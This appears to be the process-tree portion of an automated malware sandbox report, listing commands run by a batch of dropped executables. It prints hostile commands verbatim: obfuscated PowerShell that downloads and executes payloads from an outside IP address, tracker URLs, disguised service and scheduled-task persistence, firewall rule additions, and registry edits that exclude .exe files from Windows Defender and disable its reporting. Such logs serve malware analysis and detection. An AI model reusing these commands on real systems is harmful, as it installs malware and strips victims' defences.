PID:2076

C:\Users\Admin\AppData\Local\Temp\3M228.exe
"C:\Users\Admin\AppData\Local\Temp\3M228.exe"
7⤵
PID:2040

C:\Users\Admin\AppData\Local\Temp\0A9CKF1CJE69326.exe
https://iplogger.org/1OAvJ
7⤵
PID:1752

C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe
"C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe"
6⤵
PID:4640

C:\Users\Admin\AppData\Local\Temp\po50.exe
"C:\Users\Admin\AppData\Local\Temp\po50.exe"
6⤵
PID:5768

C:\Users\Admin\AppData\Local\Temp\zhangyy.exe
"C:\Users\Admin\AppData\Local\Temp\zhangyy.exe"
6⤵
PID:5376

C:\Users\Admin\AppData\Local\Temp\zhangyy.exe
"C:\Users\Admin\AppData\Local\Temp\zhangyy.exe" -h
7⤵
PID:5880

C:\Users\Admin\AppData\Local\Temp\tvstream17.exe
"C:\Users\Admin\AppData\Local\Temp\tvstream17.exe"
6⤵
PID:448

C:\Users\Admin\AppData\Local\Temp\pub1.exe
"C:\Users\Admin\AppData\Local\Temp\pub1.exe"
6⤵
PID:520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\w23j6b2t.txp.bat""
7⤵
PID:4704

C:\Users\Admin\AppData\Local\Temp\jg2_2qua.exe
"C:\Users\Admin\AppData\Local\Temp\jg2_2qua.exe"
6⤵
PID:4692

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:5408

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:5440

C:\Users\Admin\Pictures\Adobe Films\ByduaBYCZWTyfB3nbvNvi9Cb.exe
"C:\Users\Admin\Pictures\Adobe Films\ByduaBYCZWTyfB3nbvNvi9Cb.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:2328

C:\Users\Admin\Pictures\Adobe Films\n9kuCWbwTpyuOMtLZUnGC8gy.exe
"C:\Users\Admin\Pictures\Adobe Films\n9kuCWbwTpyuOMtLZUnGC8gy.exe"
3⤵
- Executes dropped EXE
PID:3680

C:\Users\Admin\Pictures\Adobe Films\HHjGlr1FOLKx5f6Nq5ZOBvru.exe
"C:\Users\Admin\Pictures\Adobe Films\HHjGlr1FOLKx5f6Nq5ZOBvru.exe"
3⤵
- Executes dropped EXE
PID:3904

C:\Users\Admin\Pictures\Adobe Films\Ss96224Wrf5JEtVKqjue6uWk.exe
"C:\Users\Admin\Pictures\Adobe Films\Ss96224Wrf5JEtVKqjue6uWk.exe"
3⤵
PID:4528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4528 -s 476
4⤵
- Program crash
PID:4724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4528 -s 500
4⤵
PID:6024

C:\Users\Admin\Pictures\Adobe Films\2WuqUmcgfN_c3YpVmnTd8KVR.exe
"C:\Users\Admin\Pictures\Adobe Films\2WuqUmcgfN_c3YpVmnTd8KVR.exe"
3⤵
PID:3508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3508 -s 460
4⤵
PID:4784

C:\Users\Admin\Pictures\Adobe Films\c1cv7B98fhQZvu1QhcPBh2NK.exe
"C:\Users\Admin\Pictures\Adobe Films\c1cv7B98fhQZvu1QhcPBh2NK.exe"
3⤵
PID:5068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 472
4⤵
- Program crash
PID:3088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 504
4⤵
PID:5640

C:\Users\Admin\Pictures\Adobe Films\lFUEJ9JMN_mSnsuwh5qYM9Gl.exe
"C:\Users\Admin\Pictures\Adobe Films\lFUEJ9JMN_mSnsuwh5qYM9Gl.exe"
3⤵
PID:1432

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\jmjqsexf\
4⤵
PID:5272

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\pdeginad.exe" C:\Windows\SysWOW64\jmjqsexf\
4⤵
PID:5772

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create jmjqsexf binPath= "C:\Windows\SysWOW64\jmjqsexf\pdeginad.exe /d\"C:\Users\Admin\Pictures\Adobe Films\lFUEJ9JMN_mSnsuwh5qYM9Gl.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:6064

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start jmjqsexf
4⤵
PID:2792

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:5452

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description jmjqsexf "wifi internet conection"
4⤵
PID:5264

C:\Users\Admin\wgtblfjk.exe
"C:\Users\Admin\wgtblfjk.exe" /d"C:\Users\Admin\Pictures\Adobe Films\lFUEJ9JMN_mSnsuwh5qYM9Gl.exe"
4⤵
PID:3576

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\kqygltix.exe" C:\Windows\SysWOW64\jmjqsexf\
5⤵
PID:3828

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config jmjqsexf binPath= "C:\Windows\SysWOW64\jmjqsexf\kqygltix.exe /d\"C:\Users\Admin\wgtblfjk.exe\""
5⤵
PID:4836

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start jmjqsexf
5⤵
PID:1988

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
5⤵
PID:3836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0240.bat" "
5⤵
PID:5088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 1040
4⤵
PID:6072

C:\Users\Admin\Pictures\Adobe Films\_t0Gb0xxJpZn7McCfFFk8oqR.exe
"C:\Users\Admin\Pictures\Adobe Films\_t0Gb0xxJpZn7McCfFFk8oqR.exe"
3⤵
PID:4416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"
4⤵
PID:5788

C:\Windows\system32\mode.com
mode 65,10
5⤵
PID:1928

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e file.zip -p320791618516055 -oextracted
5⤵
PID:4996

C:\Users\Admin\Pictures\Adobe Films\IQ05wMi5MT8AqFpPT9SHU6dD.exe
"C:\Users\Admin\Pictures\Adobe Films\IQ05wMi5MT8AqFpPT9SHU6dD.exe"
3⤵
PID:4512

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:4768

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:1912

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:604

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:4856

C:\Users\Admin\Pictures\Adobe Films\QEzTpWWfnPinIxjOqoTrwYKq.exe
"C:\Users\Admin\Pictures\Adobe Films\QEzTpWWfnPinIxjOqoTrwYKq.exe"
3⤵
PID:1928

C:\Users\Admin\AppData\Local\Temp\c45b1388-7e3d-4af6-aebd-8c81e9e032a5.exe
"C:\Users\Admin\AppData\Local\Temp\c45b1388-7e3d-4af6-aebd-8c81e9e032a5.exe"
4⤵
PID:5428

C:\Users\Admin\Pictures\Adobe Films\hZcsSLQP4iqcga99qgpXcMFz.exe
"C:\Users\Admin\Pictures\Adobe Films\hZcsSLQP4iqcga99qgpXcMFz.exe"
3⤵
PID:2076

C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe
"C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"
4⤵
PID:4720

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
4⤵
PID:4592

C:\Users\Admin\Pictures\Adobe Films\jm3HAZV_NmXNomcsZBsO8PWK.exe
"C:\Users\Admin\Pictures\Adobe Films\jm3HAZV_NmXNomcsZBsO8PWK.exe"
3⤵
PID:3928

C:\Users\Admin\AppData\Local\Temp\A5CIE.exe
"C:\Users\Admin\AppData\Local\Temp\A5CIE.exe"
4⤵
PID:5180

C:\Users\Admin\AppData\Local\Temp\04H4E.exe
"C:\Users\Admin\AppData\Local\Temp\04H4E.exe"
4⤵
PID:6032

C:\Users\Admin\AppData\Local\Temp\D55K0.exe
"C:\Users\Admin\AppData\Local\Temp\D55K0.exe"
4⤵
PID:5952

C:\Users\Admin\AppData\Local\Temp\G8B9G.exe
"C:\Users\Admin\AppData\Local\Temp\G8B9G.exe"
4⤵
PID:3660

C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" -S .\b0EiM8L.W -U
5⤵
PID:5204

C:\Users\Admin\AppData\Local\Temp\G5KL34E2CK0EHFG.exe
https://iplogger.org/1nChi7
4⤵
PID:5508

C:\Users\Admin\Pictures\Adobe Films\5ibImGROksDt0LhPghaDK8u5.exe
"C:\Users\Admin\Pictures\Adobe Films\5ibImGROksDt0LhPghaDK8u5.exe"
3⤵
PID:1512

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
4⤵
PID:5680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 620
4⤵
PID:5964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 944
4⤵
PID:1180

C:\Users\Admin\Pictures\Adobe Films\EGPt92KTmWfvaMnD5NmMWZCm.exe
"C:\Users\Admin\Pictures\Adobe Films\EGPt92KTmWfvaMnD5NmMWZCm.exe"
3⤵
PID:3540

C:\Users\Admin\Pictures\Adobe Films\Xt2Fcv1Jbk1PKWTQlnf3saAg.exe
"C:\Users\Admin\Pictures\Adobe Films\Xt2Fcv1Jbk1PKWTQlnf3saAg.exe"
3⤵
PID:2028

C:\Users\Admin\Pictures\Adobe Films\oumII6Q2avjuk0Ds5DVeqcBh.exe
"C:\Users\Admin\Pictures\Adobe Films\oumII6Q2avjuk0Ds5DVeqcBh.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1252

C:\Users\Admin\Pictures\Adobe Films\AIOs52ptMK7ksGBBNb6S4qEp.exe
"C:\Users\Admin\Pictures\Adobe Films\AIOs52ptMK7ksGBBNb6S4qEp.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4204

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im AIOs52ptMK7ksGBBNb6S4qEp.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\AIOs52ptMK7ksGBBNb6S4qEp.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:5720

C:\Windows\SysWOW64\taskkill.exe
taskkill /im AIOs52ptMK7ksGBBNb6S4qEp.exe /f
5⤵
- Kills process with taskkill
PID:2288

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:3424

C:\Users\Admin\Pictures\Adobe Films\qevwR0y5gSj_fLxDoqCOS04H.exe
"C:\Users\Admin\Pictures\Adobe Films\qevwR0y5gSj_fLxDoqCOS04H.exe"
3⤵
- Executes dropped EXE
PID:380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 380 -s 632
4⤵
PID:5988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 380 -s 692
4⤵
PID:6064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 380 -s 828
4⤵
PID:1580

C:\Users\Admin\Pictures\Adobe Films\LLu74zxLUwRvf6Wu4dBPkIHT.exe
"C:\Users\Admin\Pictures\Adobe Films\LLu74zxLUwRvf6Wu4dBPkIHT.exe"
3⤵
- Executes dropped EXE
PID:3808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2456 -ip 2456
1⤵
PID:1644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2456 -ip 2456
1⤵
PID:2328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2456 -ip 2456
1⤵
PID:4076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2456 -ip 2456
1⤵
PID:4056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2456 -ip 2456
1⤵
PID:1012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2456 -ip 2456
1⤵
PID:4928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2456 -ip 2456
1⤵
PID:3368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 2456 -ip 2456
1⤵
PID:3508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2456 -ip 2456
1⤵
PID:4600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 2456 -ip 2456
1⤵
PID:1928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2456 -ip 2456
1⤵
PID:3016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2456 -ip 2456
1⤵
PID:1940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2456 -ip 2456
1⤵
PID:2136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2456 -ip 2456
1⤵
PID:312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2456 -ip 2456
1⤵
PID:1644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2456 -ip 2456
1⤵
PID:3724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 2456 -ip 2456
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2456 -ip 2456
1⤵
PID:8

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2456 -ip 2456
1⤵
PID:1244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2456 -ip 2456
1⤵
PID:4872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2456 -ip 2456
1⤵
PID:3076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3848 -ip 3848
1⤵
PID:1040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3848 -ip 3848
1⤵
PID:4128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3848 -ip 3848
1⤵
PID:1756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 3848 -ip 3848
1⤵
PID:2040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3848 -ip 3848
1⤵
PID:2280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3848 -ip 3848
1⤵
PID:928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3848 -ip 3848
1⤵
PID:4784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 3848 -ip 3848
1⤵
PID:4384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3848 -ip 3848
1⤵
PID:1500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3848 -ip 3848
1⤵
PID:4436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3848 -ip 3848
1⤵
PID:2704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3848 -ip 3848
1⤵
PID:4204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3848 -ip 3848
1⤵
PID:1012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3848 -ip 3848
1⤵
PID:2412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3848 -ip 3848
1⤵
PID:3976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3848 -ip 3848
1⤵
PID:4648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1996 -ip 1996
1⤵
PID:3396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1996 -ip 1996
1⤵
PID:1292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1996 -ip 1996
1⤵
PID:4500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 1996 -ip 1996
1⤵
PID:4592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1996 -ip 1996
1⤵
PID:4564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 1996 -ip 1996
1⤵
PID:4656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1996 -ip 1996
1⤵
PID:4716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 1996 -ip 1996
1⤵
PID:3308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1996 -ip 1996
1⤵
PID:1744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1996 -ip 1996
1⤵
PID:364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1996 -ip 1996
1⤵
PID:344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1996 -ip 1996
1⤵
PID:2252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1996 -ip 1996
1⤵
PID:2192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1996 -ip 1996
1⤵
PID:3292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1996 -ip 1996
1⤵
PID:4920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 1996 -ip 1996
1⤵
PID:2696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1996 -ip 1996
1⤵
PID:4124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1996 -ip 1996
1⤵
PID:4008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1996 -ip 1996
1⤵
PID:1868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1996 -ip 1996
1⤵
PID:4648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1996 -ip 1996
1⤵
PID:1040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1996 -ip 1996
1⤵
PID:2288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1996 -ip 1996
1⤵
PID:4300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1996 -ip 1996
1⤵
PID:1300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 1996 -ip 1996
1⤵
PID:4520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3508 -ip 3508
1⤵
PID:2308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5068 -ip 5068
1⤵
PID:3108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4528 -ip 4528
1⤵
PID:2516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 380 -s 624
1⤵
PID:1956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 380 -ip 380
1⤵
PID:780

C:\Users\Admin\AppData\Local\Temp\7zS27D4.tmp\Install.exe
.\Install.exe
1⤵
PID:2500

C:\Users\Admin\AppData\Local\Temp\7zS4CFF.tmp\Install.exe
.\Install.exe /S /site_id "525403"
2⤵
PID:5652

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
3⤵
PID:4412

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
4⤵
PID:6064

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
5⤵
PID:5360

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
5⤵
PID:3804

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
3⤵
PID:5716

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
4⤵
PID:528

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
5⤵
PID:5340

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
5⤵
PID:1440

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gLjuEjicK" /SC once /ST 02:29:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:2248

C:\Users\Admin\AppData\Local\Temp\H3909.exe
"C:\Users\Admin\AppData\Local\Temp\H3909.exe"
1⤵
PID:4332

